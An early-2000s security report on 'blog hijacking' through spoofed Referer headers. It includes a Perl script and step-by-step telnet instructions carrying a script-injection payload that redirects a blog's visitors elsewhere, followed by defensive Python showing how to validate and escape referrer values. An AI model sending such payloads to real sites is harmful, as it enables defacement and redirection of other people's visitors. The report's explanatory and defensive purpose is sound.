Rootsecure.net recently came across this post:
http://www.unix-girl.com/blog/archives/000726.html, which describes how it is
possible to hijack blogs (along with any other site running similarly insecure
scripts) and was the inspiration for this report.
Referrer spoofing means changing the page that the site you go to thinks you
came from. Normally, when you are on site A and click a link taking you to
site B, your browser sends site B the location of the page you were just on
(site A) in the Referer request header. This has been possible ever since
people started using home-grown insecure scripts on their pages (i.e. ones
which do not properly filter out HTML characters such as < > " ' & ;);
however, this is the first time Rootsecure.net has heard of the new phenomenon
of "blog hijacking©" (spoofing your referrer to a blog so that everyone else
who visits it is redirected to another blog/site of your choice).
It is usually highly noticeable because most blogs display referrers on their
home page.
The following Perl script can be used for such a purpose:
#!/usr/bin/perl -w
print "Content-Type: text/html\n\n";
my $url = "http://www.example.com";
use LWP::UserAgent;
use HTTP::Request::Common qw(GET POST);
my $agent = LWP::UserAgent->new;
my $req = GET $url, Referer => "\"></a><script>top.location.href=\'http://www.someotherblog.com\';</script><a href=\"http://localhost\"";
# The request is only built here; it is not sent while the next line stays commented out.
#print $agent->request($req)->as_string;
However, by far the simpler way is to connect to the website via telnet, which
should be readily available on any respectable computer.
- Open a command window and type in telnet followed by the name of the site
followed by 80, e.g.
telnet www.example.com 80 (do not include http://)
- Type the following into the command window (after changing the Host field
and GET request) - I would recommend copying the whole lot into notepad,
making the changes, then copy/pasting it into the command window.
GET /index.pl HTTP/1.1
Host: example.com
Accept: *.*
User-Agent: Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1)
Referer: http://"></a><script>top.location.href='http://www.someotherblog.com';</script><a href="http://localhost"
(Note the referrer is all one line, and is spelt "Referer")
- Hit enter twice (the one in the middle of the keyboard, not the one on
the number pad)
Note: Other blogs will have implemented their referrer logging scripts in
different ways, therefore care is needed to properly end/begin HTML tags.
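On the defending side, the fix belongs in the referrer-listing script itself,
whatever markup it wraps around the value. The following is an added example,
not code from the original report or from any blog package: it contrasts a
listing routine that writes the Referer header straight into the page with one
that validates and HTML-escapes it. The function names and sample values are
constructed for illustration.

```python
import html
from urllib.parse import urlsplit

# Constructed sample Referer values: two ordinary ones, the markup-carrying
# value shown in the report, and one with a non-HTTP scheme.
SAMPLE_REFERERS = [
    "http://www.example.com/links.html",
    "http://search.example.org/?q=blog&lang=en",
    "http://\"></a><script>top.location.href='http://www.someotherblog.com';"
    "</script><a href=\"http://localhost\"",
    "ftp://files.example.net/pub/",
]

def render_unsafe(referers):
    """Flawed pattern: the header value is written into the page unfiltered."""
    return "\n".join('<li><a href="%s">%s</a></li>' % (r, r) for r in referers)

def is_plausible_url(value):
    """Accept only http(s) URLs that contain no markup or whitespace."""
    try:
        parts = urlsplit(value)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    return not any(c in value for c in "<>\"' \t\r\n")

def render_safe(referers):
    """Validate each value, then HTML-escape it before it reaches the page."""
    items = []
    for r in referers:
        if not is_plausible_url(r):
            continue  # keep it out of the public list
        esc = html.escape(r, quote=True)
        items.append('<li><a href="%s" rel="nofollow">%s</a></li>' % (esc, esc))
    return "\n".join(items)

if __name__ == "__main__":
    print(render_unsafe(SAMPLE_REFERERS))
    print("----")
    print(render_safe(SAMPLE_REFERERS))
```

Escaping alone already neutralises the injected tags; the validation step additionally keeps junk values off the public referrer list.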
Update: Blog that was originally hijacked -
http://jeremy.zawodny.com/blog/archives/000536.html
Roundup of "Blog-Hijacking" -
http://www.notestips.com/80256B3A007F2692/1/NAMO-5KC2YN
Further Update: The Register have picked up the story.